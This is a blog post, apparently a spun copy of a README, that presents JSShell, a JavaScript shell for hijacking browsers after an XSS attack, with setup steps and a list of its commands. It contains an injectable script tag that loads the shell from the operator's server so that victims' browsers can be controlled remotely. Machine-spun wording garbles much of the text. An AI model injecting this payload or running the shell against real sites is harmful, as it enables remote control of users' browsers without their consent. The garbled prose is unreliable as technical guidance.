Jsshell - An Interactive Multi-User Spider Web Js Shell - Hi friends mederc, In the article that you read this time with the title Jsshell - An Interactive Multi-User Spider Web Js Shell, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts Article BeEF, Article Command Line, Article Exploit, Article JavaScript, Article JS Shell, Article JSShell, Article Linux, Article Mac, Article Python, Article Remote, Article Remote Code Execution, Article Windows, we write this you can understand. Alright, happy reading.

Title : Jsshell - An Interactive Multi-User Spider Web Js Shell
link : Jsshell - An Interactive Multi-User Spider Web Js Shell

Jsshell - An Interactive Multi-User Spider Web Js Shell

An interactive multi-user spider web based javascript shell. It was initially created inward social club to debug remote esoteric browsers during experiments in addition to research. This tool tin last easily attached to XSS (Cross Site Scripting) payload to accomplish browser remote code execution (similar to the BeeF framework).
Version 2.0 is created only from scratch, introducing novel exciting features, stability in addition to maintainability.

Author
Daniel Abeles.

Shell Video

Features

• Multi customer support
• Cyclic DOM objects support
• Pre flying scripts
• Command Queue & Context
• Extensible amongst Plugins
• Injectable via <script> tags
• Dumping command output to file
• Shell pagination

Installation & Setup

Config File
In the resources directory, update the config.json file amongst your desired configuration:

• Database host - if running amongst the docker deployment method, pick out the database host every bit db (which is the internal host name).
• Return URL - the URL which the requests volition follow. The shell.js file does about AJAX calls to register in addition to poll for novel commands. Usually it volition last http://{YOUR_SERVER_IP}:{PORT}.
• Startup script - a script that runs automatically when the JSShell CLI customer is spawned.
• It is also possible to indicate at a remote database if desired.

Docker
This novel version instructed installing in addition to running via docker in addition to docker-compose. Now, to install in addition to run the entire JSShell framework, only run:

$ ./start_docker_shell.sh

This will:

• Start in addition to practise the database inward the background
• Start the spider web API server that handles incoming connections inward the background
• Spawn a novel event of the JSShell command line interface container

Regular
If you lot nevertheless wish to purpose the sometime fashion method of installing, only brand certain you lot accept a MongoDB database upward in addition to running, in addition to update the config.json file residing inward the resources directory.
I recommend using a virtual environs amongst pyenv:

$ pyenv virtualenv -p python3.6 venv $ pyenv activate venv

Or using virtualenv:

$ virtualenv -p python3.6 venv $ source venv/bin/activate

Then, install the requirements:

$ pip install -r requirements.txt

Running
If you lot used the docker method, there's no withdraw to run the next procedure.

Web Server
Otherwise, 1 time nosotros accept the database setup, nosotros withdraw to initiatory off the spider web API server. To do, run:

$ python manage.py web

This volition practise in addition to run a spider web server that listens to incoming connections in addition to serves our JSShell code.

Shell
Now to initiatory off the JSShell CLI, run the same script but at 1 time amongst the shell flag:

$ python manage.py shell

Usage
After setup in addition to running the required components, larn into the help command to encounter the available commands:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬        ║╚═╗└─┐├─┤├┤ │  │       ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0              yesteryear @Daniel_Abeles      >> attention  Documented commands (type attention <topic>):  General Commands -------------------------------------------------------------------------------- edit                Edit a file inward a text editor attention                List available commands or supply detailed attention for a specific command history             View, run, edit, save, or clear previously entered commands ipy                 Enter an interactive IPython rhythm py                  Invoke Python command or rhythm quit                Exit this application  Shell Based Operations -------------------------------------------------------------------------------- dorsum                Un-select the electrical flow selected customer clients             List in addition to command the clients that accept registered to our organization commands            Show the executed commands on the selected customer dump                Dumps a command to the disk execute             Execute commands on the selected customer select              Select a customer every bit the electrical flow customer  >> 

Flow
JSShell supports two methods of operation:

1. Injectable Shell (similar to BeeF framework)
2. Hosted Shell (for debugging)

Injectable Shell
Similar to other XSS command frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. In example, if you lot tin inject a script tag, inject the next resources to your payload, in addition to a novel customer volition seem inward your console:
<script src="http://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell
If you lot wish to debug exotic in addition to esoteric browsers, you lot tin only navigate to http://{YOUR_SERVER_IP}:{PORT}/ in addition to a novel customer volition popular upward into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits
Canop for JSON.prune

use it at your ain responsibleness in addition to risk.

Download JSShell

Thus the article Jsshell - An Interactive Multi-User Spider Web Js Shell

That's all the article Jsshell - An Interactive Multi-User Spider Web Js Shell this time, hopefully can benefit you all. okay, see you in another article posting.

You are now reading the article Jsshell - An Interactive Multi-User Spider Web Js Shell with the link address https://mederc.blogspot.com/2019/09/jsshell-interactive-multi-user-spider.html

Share this post